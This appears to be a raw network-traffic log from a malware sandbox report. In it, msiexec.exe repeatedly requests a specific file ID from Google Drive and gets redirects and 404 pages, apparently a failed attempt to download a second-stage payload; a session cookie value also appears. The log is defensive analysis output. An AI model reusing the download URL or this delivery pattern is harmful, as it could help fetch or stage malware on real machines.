                                                              2025-01-10 23:02:37 UTC  418                OUT        GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:38 UTC  1920               IN         HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:37 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-4kBliDViLGmatds8AIoH1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              41          192.168.2.8  49750        172.217.16.193  443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:38 UTC  460                OUT        GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:39 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSBrkuQsPgmMEskLxGC8hVJpfkBFz_TA9Kd-xz1ltYF9nPDo0zqAibtQJgWLo7WIU7T
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:38 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-IglOiNTc-nCREr1D1YXe2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:39 UTC  1652               IN
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LNvphKpuvqUZb5AkHUQygw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              42          192.168.2.8  49751        216.58.206.46   443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:39 UTC  418                OUT        GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:40 UTC  1920               IN         HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:40 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-D2yPVh-2J5-N9xktrRNqpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              43          192.168.2.8  49752        172.217.16.193  443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:40 UTC  460                OUT        GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:41 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRIsS3_VR1zqWgNr05Qpyb2NV_oR098XDlKKkRQR6x8doYWwv4L_9IT-MFIRtJewoQlolLcUyg
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:41 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-ado2d8D14lTUJJHIjNGIug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:41 UTC  1652               IN
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WfSCEKiaOqhr13QzzKnOgw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              44          192.168.2.8  49753        216.58.206.46   443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:42 UTC  418                OUT        GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:42 UTC  1920               IN         HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:42 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-lUeTrsJ0Mno7uh2hcEqE-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              45          192.168.2.8  49754        172.217.16.193  443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:43 UTC  460                OUT        GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:43 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQddutKmDAyiLh6KjyyQXHoFCujtkvNkLpzhF62EnYvRaNnqF9LMzc9hGvxmnzlqDRz
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:43 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-sMlgXdLfw758_kVJkUeB8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:43 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7fmA0KzjSzDYd-gBBJDAGg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              46 | 192.168.2.8 | 49755 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:44 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:44 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-IuhpLxp92NrI4fSEoYDr2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              47 | 192.168.2.8 | 49756 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:45 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:45 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC6lvTj79Wqf7IQPqXc9LIhDplZxpFurjOCd4i9NkftsKE5fNccmDa6P7uWXRY6wEZGj
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:45 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-ofVOmCbap95lBIkTCA-a0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:45 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eKpauhpirSukFdzRfKBKng">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              48 | 192.168.2.8 | 49757 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:46 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:47 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:46 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-Hi0p9QAUsVoY8VMqqSHx2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
